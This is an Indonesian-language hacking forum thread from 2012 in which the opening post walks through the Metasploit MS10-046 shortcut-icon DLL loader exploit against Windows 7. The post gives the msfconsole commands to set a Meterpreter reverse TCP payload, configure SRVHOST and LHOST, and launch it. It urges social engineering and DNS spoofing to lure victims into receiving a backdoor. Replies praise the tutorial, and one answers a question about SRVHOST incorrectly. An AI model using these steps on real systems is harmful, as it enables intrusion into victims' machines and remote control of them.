Exploit ms10_046_shortcut_icon_dllloader win7 attack - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html) +--- Forum: Dracos-linux (https://www.indonesianbacktrack.or.id/forum/forum-156.html) +--- Thread: Exploit ms10_046_shortcut_icon_dllloader win7 attack (/thread-3754.html) |
Exploit ms10_046_shortcut_icon_dllloader win7 attack - zee eichel - 10-07-2012 exploit ini masih work di windows7 .. walaupun memang dibutuhkan tehnik2 social engineering untuk membawa target membuka malicious url yang sudah anda siapkan sebelumnya … oke untuk tutorial kali ini kembali lagi ane menggunakan dracos2 x64 .. mungkin yang mau nyoba-nyoba dracos bisa kesini http://dracos-linux.org Pertama-tama buka console msf kita .. ( bypass lewat msfcli juga bisa kok ) Code: root@dracos:~# msfconsole Setelah terbuka seperti ini lanjutkan dengan menggunakan fasilitas search Code: msf > search LNK Tuh sudah kelihatan exploit yang kita cari .. gunakan exploit tersebut Code: msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader Terus biar kita jadi mode listener kita gunakan payload windows meterpreter reverse TCP Code: msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp Cek opsi2 yang kita perlu dalam menjalankan exploit ini Code: msf exploit(ms10_046_shortcut_icon_dllloader) > show options Ok kita butuh alamat server ( srvhost ) dimana nantinya metasploit akan memulai malicious url dengan port 80 ( default ) dan path / uripath ( / ) Code: msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.2.7 Kebetulan sih ip yang ane pake pada percobaan ini adalah Code: root@dracos:~# ifconfig wlan0 |grep inet Terus sebagai persyaratan payload reverse TCP kita wajib memberikan informasi local host kita ( LHOST ) Code: msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.2.7 Jalankan exploit dengan perintah exploit .. gk usah di tambahkan -j untuk opsi background process karena exploit ini sudah dengan sendirinya berjalan di sana Code: msf exploit(ms10_046_shortcut_icon_dllloader) > [*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Sending UNC redirect hmm ketika target membuka url malicious kita maka dengan sendiri nya server malicious akan mengirimkan backdoor .. dan meterpreter pun terbuka untuk attacker Notes : gunakan tehnik2 social engineering, dns spoof dan masih banyak lagi untuk menggiring korban anda dalam mengakses server malicious anda .. akhir kata saya ucapkan selamat makan RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - m4k4ss4rh4ck3r - 10-07-2012 nice inpohh kakak zeee ...................;;;;;;;;;;; RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - Junior Riau - 10-07-2012 mantap om zee, (y) bakal seru nih nampaknya RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - wine trochanter - 10-08-2012 wow keren om zee, kpn2 perkosa lepi ane lagi yah RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - xsan-lahci - 10-08-2012 wakakak akhir katanya selamat makan ada-ada aja om zee nih ga ada matinye dah ah kalo maenan metasploit RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - shift-del - 10-08-2012 keren.. ikutan cobain juga ane,, udah gataltangan mw maen metasploit RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - Al - Ayyubi - 10-08-2012 baru aja kelar download langsung coba ah trimakasih om zee tutornya RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - kakus130908 - 10-08-2012 izin mempelajari tricknya om RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - gnome_selpa - 10-09-2012 om zee, maap ni yak ? srvhost itu apa kan lhost itu ip kita, sedangkan srvhost yang om zee bikin itu sama ama lhost... bisa di jelasin dikit om, biar kagak bingung, thanks om zee ? RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - Junior Riau - 10-09-2012 (10-09-2012, 12:43 AM)gnome_selpa Wrote: om zee, maap ni yak ? srvhost itu kalau nda salah server untuk listening dll nya waktu berjalan gitu loh, lihat aja di windos taksmanager, semakin banyak kita buka aplikasi, lihat service srvhost.exe semakin banyak |